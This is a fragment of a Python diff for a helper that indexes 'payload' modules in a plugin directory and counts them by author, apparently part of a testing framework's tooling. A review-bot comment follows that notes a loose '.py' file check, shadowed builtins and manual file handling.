f.write(NUM+str) + f.close() + + +######################################################################################################################## +#dev +def get_moudle_dev(): + # dir = 'Moudle' #pro + dir = '../Moudle' #dev + list=os.listdir(dir) + moudles=[] + for i in list: + if i !='__pycache__': + path = os.path.join(dir, i) + if os.path.isdir(path): + 
moudles.append(i) + return moudles +def get_payload_dev(moudle): + # dir = 'Moudle/'+moudle #pro + dir = '../Moudle/'+moudle #dev + list = os.listdir(dir) + payloads = [] + for i in list: + tmp=[] + path = os.path.join(dir, i) + if os.path.isfile(path): + if '.py' in i: + payload=i.replace('.py','') + tmp.append(payload) + tmp.append(get_remark(moudle,payload)) + tmp.append(get_author(moudle, payload)) #dev + payloads.append(tmp) + return payloads + +def get_author(moudle,payload): + return import_module('Moudle.'+moudle+'.'+payload).AUTHOR + +def Rebuild_dev(): + moudles=get_moudle_dev() + res=[] + for i in moudles: + for j in get_payload_dev(i): + res.append(j[2]) + dic=Counter(res) + for key in dic: + value = dic[key] + print(key,value) + + +if __name__ == '__main__': + # get_moudle() + # Rebuild() + Rebuild_dev() \ No newline at end of file
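Review bot: `if '.py' in i:` in `get_payload` and again in `get_payload_dev` is a substring test, so `foo.pyc` or `foo.py.bak` in a module directory also passes and `i.replace('.py','')` then yields a name such as `fooc` that `import_module` cannot resolve; `if i.endswith('.py'): payload = i[:-3]` is the intended check. `str`, `list` and `dir` shadow builtins throughout the file, which is harmless here but makes `Rebuild`'s `str=str+(...)` accumulation hard to read. `Rebuild` writes `Moudle/Moudle_index.py` with a manual `open`/`write`/`close`; `with open('Moudle/Moudle_index.py','w') as f: f.write(NUM+str)` closes the handle on an exception as well. Both `get_remark` and `get_author` import every module at rebuild time, so a module whose top level raises or does network I/O aborts the rebuild — worth a comment on those helpers.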